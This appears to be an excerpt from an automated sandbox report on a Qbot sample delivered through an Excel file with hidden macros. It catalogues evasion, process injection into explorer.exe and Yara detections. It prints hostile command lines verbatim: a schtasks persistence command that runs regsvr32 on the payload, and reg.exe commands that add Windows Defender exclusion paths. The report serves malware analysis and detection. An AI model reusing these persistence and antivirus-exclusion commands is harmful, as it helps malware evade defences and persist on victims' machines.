Source: C:\Windows\SysWOW64\explorer.exe TID: 1412 Thread sleep time: -64000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 6_2_7057D061
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057AEF6 FindFirstFileW,FindNextFileW, 6_2_7057AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003CAEF6 FindFirstFileW,FindNextFileW, 7_2_003CAEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701EAEF6 FindFirstFileW,FindNextFileW, 14_2_701EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0037AEF6 FindFirstFileW,FindNextFileW, 15_2_0037AEF6

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70575F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 6_2_70575F63
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057DFEF LoadLibraryA,GetProcAddress, 6_2_7057DFEF
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70621DC2 mov eax, dword ptr fs:[00000030h] 6_2_70621DC2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70621C96 mov eax, dword ptr fs:[00000030h] 6_2_70621C96
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_706219A1 push dword ptr fs:[00000030h] 6_2_706219A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_70291DC2 mov eax, dword ptr fs:[00000030h] 14_2_70291DC2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_70291C96 mov eax, dword ptr fs:[00000030h] 14_2_70291C96
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_702919A1 push dword ptr fs:[00000030h] 14_2_702919A1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003C5A54 RtlAddVectoredExceptionHandler, 7_2_003C5A54
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00375A54 RtlAddVectoredExceptionHandler, 15_2_00375A54

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: C102D
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: C102D
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3032 base: 80000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3032 base: C102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2800 base: 80000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2800 base: C102D value: E9
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Compensation_Reject-958463727-09292021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hhxoksfm /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 11:16 /ET 11:28
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yenslqus' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gruwmuaixpvu' /d '0'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: explorer.exe, 00000007.00000002.1075088043.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.1075088043.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000007.00000002.1075088043.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003C31B5 CreateNamedPipeA, 7_2_003C31B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_705797ED GetSystemTimeAsFileTime, 6_2_705797ED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 6_2_7057D061

Stealing of Sensitive Information:

Yara detected Qbot
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.regsvr32.exe.701e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorer.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.243169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1074790261.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1074770331.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.806337826.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.881210021.00000000004C0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Qbot
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.regsvr32.exe.701e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorer.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.243169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1074790261.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1074770331.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.806337826.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.881210021.00000000004C0000.00000040.00000001.sdmp, type: MEMORY